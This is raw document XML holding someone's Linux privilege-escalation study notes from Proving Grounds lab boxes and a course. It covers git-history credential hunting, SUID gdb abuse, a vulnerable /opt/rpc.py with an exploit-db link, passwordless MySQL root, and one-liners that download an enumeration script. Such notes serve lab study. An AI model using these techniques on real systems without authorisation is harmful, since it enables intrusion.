            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="409" name="image412.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image412.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41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1528">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId412">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BTRSys2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, and it revealed credentials for root user for MySQL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001529">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyzing Github Files section:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152B">
      <w:pPr>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="417" name="image401.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image401.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41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152C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="731"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on the output in listing 23, we can assume that Git is used as the version control system for the WordPress instance. Reviewing the commits of the Git repository may allow us to identify changes in configuration data and sensitive information such as passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000152D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="731"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The directory is owned by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is not readable by other users as shown in Listing 23. However, we can leverage sudo to use Git commands in a privileged context and therefore search the repository for sensitive information.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Files with Interesting Permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001530">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4090988" cy="2432302"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="273" name="image271.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image271.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId414"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4090988" cy="2432302"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001531">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId415">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Gaara</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play box, and /usr/bin/gdb was actually vulnerable since if you looked at GTFOBins, there was an SUID section (if you look at the second line in the screenshot, you can tell that this was an SUID attack vector) with a command that allowed for instant root</w:t>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001534">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cleaned Processes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001535">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2743200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78" name="image81.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image81.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41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536">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files, since those are 3rd party softwares, and not standard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001537">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId417">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, there was a process running /opt/rpc.py which was vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It had an exploit that allowed RCE. More can be found about rpc.py in this document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001539">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId418">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50983</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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3C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h771kll5abkr" w:id="180"/>
      <w:bookmarkEnd w:id="180"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Smart Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000153D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId419">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/diego-treitos/linux-smart-enumeration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000153E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000153F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One liners to download it and get allow it to be executed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001540">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001541">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001542">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001543">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001544">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flags:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to ignore the questions it asks you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001546">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to make it verbose level 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001547">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The levels are 0 (no flag), 1, and 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001548">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001549">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1lcycbtq8w9e" w:id="181"/>
      <w:bookmarkEnd w:id="181"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Helpful sections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All from Tib3rius Linux Priv Esc Course</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uncommon SUID bit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000154F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="121" name="image112.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image112.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42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550">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uncommon SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001551">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From SUID video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001552">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001553">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001554">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="584200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="274" name="image268.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image268.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42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555">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can connect to MySQL as root without any password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001556">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001557">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron job PATH:</w:t>
      </w:r>
    </w:p>
